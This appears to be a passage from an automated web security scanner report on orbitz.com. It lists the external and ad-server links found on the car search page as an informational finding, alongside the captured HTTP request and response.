http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext5&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext6&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext7&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext8&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=05C967C0F0A14D4101835934150D3894; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Set-Cookie: DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy||||||||||mm/dd/yy|||||||||||||||||||||||||||||||||||||||||||advanced_search|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:26 GMT; Path=/
Content-Type: text/html
Date: Wed, 02 Feb 2011 16:06:25 GMT
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/
Content-Length: 61129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/
...[SNIP]...
<noscript>
    <img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No" />
        </noscript>
...[SNIP]...
<div class="ad" id="ad728x90_top">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
</form>
   <script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
<div class="ad" id="ad519x225">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=225&width=519&adType=noframe&" height="225" width="519" border="0"></a>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext5&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext6&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext7&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<li><script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext8&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script>
...[SNIP]...
<div class="ad" id="ad519x150">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=150&width=519&adType=noframe&" height="150" width="519" border="0"></a>
...[SNIP]...
<div class="ad" id="ad519x120">
<script language="JavaScript1.1" src="http://www.revresda.com/html.ng/channel=car&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=120&rotator=module&width=519&adType=script&"></script>
...[SNIP]...
<div class="ad" id="ad728x90">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=90&width=728&adType=noframe&" height="90" width="728" border="0"></a>
...[SNIP]...
<li><a href="http://www.orbitzgames.com" rel="nofollow">Orbitz Games</a>
...[SNIP]...
<li><a href="http://www.orbitz-ir.com" rel="nofollow">Investors</a>
...[SNIP]...
<li><a href="http://www.orbitzforagents.com/" rel="nofollow">Orbitz for Agents</a>
...[SNIP]...
<li class="icon">
               <a href="http://www.facebook.com/Orbitz" rel="nofollow" target="_blank">Facebook<img class="icon" src="/site/img/chrome/nav/facebook.png" />
...[SNIP]...
<li class="icon last">
               <a href="http://twitter.com/orbitz" rel="nofollow" target="_blank">Twitter<img class="icon" src="/site/img/chrome/nav/twitter.png" />
...[SNIP]...
<div class="thirdPartyLogos">
           <script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&" height="55" width="120" border="0"></a>
...[SNIP]...
<div class="ad" id="ad1">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=1&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad2">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=2&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad3">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=3&" height="1" width="1" border="0"></a>
...[SNIP]...
<div class="ad" id="ad4">
<script language="JavaScript1.1" src="http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&"></script><noscript><a href="http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&"><img src="http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662786130&dsrc=7&height=1&width=1&adType=noframe&pos=4&" height="1" width="1" border="0"></a>
...[SNIP]...

17.337. http://www.orbitz.com/App/DisplayCarSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DisplayCarSearch

Issue detail

The page was loaded from a URL containing a query string:

http://www.orbitz.com/App/DisplayCarSearch?retrieveParams=true&searchMethodHidden=expand&expandSearchOptions=true&z=2ec3&r=m#

The response contains the following links to other domains:

http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/njs.gif?dcsuri=/nojavascript&WT.js=No
http://twitter.com/orbitz
http://www.facebook.com/Orbitz
http://www.google.com/jsapi
http://www.orbitz-ir.com/
http://www.orbitzforagents.com/
http://www.orbitzgames.com/
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/click.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=519x120&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=120&rotator=module&width=519&adType=script&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext2&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext3&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext4&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext5&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext6&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext7&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/html.ng/channel=car&Section=main&adsize=hometext8&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/image.ng/Params.richmedia=yes&channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=1&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=2&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=3&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=1x1&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=1&width=1&adType=noframe&pos=4&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x150&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=150&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=519x225&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=225&width=519&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&
http://www.revresda.com/js.ng/channel=car&Section=main&adsize=728x90_top&CookieName=OSC&secure=false&v=173.193.214.243-3953790720.30125555&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1296662787229&dsrc=7&height=90&width=728&adType=noframe&

Request

GET /App/DisplayCarSearch?retrieveParams=true&searchMethodHidden=expand&expandSearchOptions=true&z=2ec3&r=m# HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
